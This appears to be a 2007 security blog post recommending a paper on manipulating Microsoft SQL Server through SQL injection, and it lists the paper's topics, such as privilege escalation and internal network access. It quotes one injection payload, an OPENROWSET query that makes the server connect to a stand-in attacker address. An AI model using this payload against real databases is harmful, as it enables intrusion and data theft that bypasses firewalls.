Bending MS SQL Server and Greasing It Up
I just read a great article published by Application Security Inc. which gave me some good ideas for my future SQL Injection attacks. It starts like this :
select * from OPENROWSET(’SQLoledb’, ‘uid=sa;pwd=;Network=DBMSSOCN;Address=hackersip,80;’, ’select * from table’)
Well, having the SQL server call home to your machine is cool enough (bye bye firewall) , but the paper’s author, Cesar Cerrudo went a step forward . These are the main topics covered by his paper :
- Detection of sql injection vulnerabilities
- Retrieving results from sql injection
- Elevating privileges
- Uploading files
- Getting into the internal network
- Port scanning
- Recommendations
I highly recommend Manipulating Microsoft SQL Server Using SQL Injection
If you enjoyed this post, make sure you subscribe to my RSS feed!
Thank you for reading this post. You can now Leave A Comment (0) or Leave A Trackback.
Post Info
This entry was posted on Sunday, March 4th, 2007 and is filed under Sql Injection, Articles.You can follow any responses to this entry through the Comments Feed. You can Leave A Comment, or A Trackback.
Previous Post: Watch YouTube and Identify Criminals »
Next Post: Web App Security Hall Of Fame - Meet the Gurus part 3 »
Read More
Related Reading:
Latest Posts:
- Privacy Dilemma: How to Protect Yourself Online
- Solera Networks Deep-Packet Capture Review
- WordPress Exploit Scanner
- Phishing Exposed, Brands Secured
- Scanners: New Nessus Release; New eEye Web Scanner
- Good News from ArcSight and Imperva
- CCTV Security Camera and Surveillance Equipment
- OpenDNS Offers Free Web Content Filtering
- Can I Evade ScanSafe Anywhere+ ?
- Googlehacks and Anti-Googlehacks
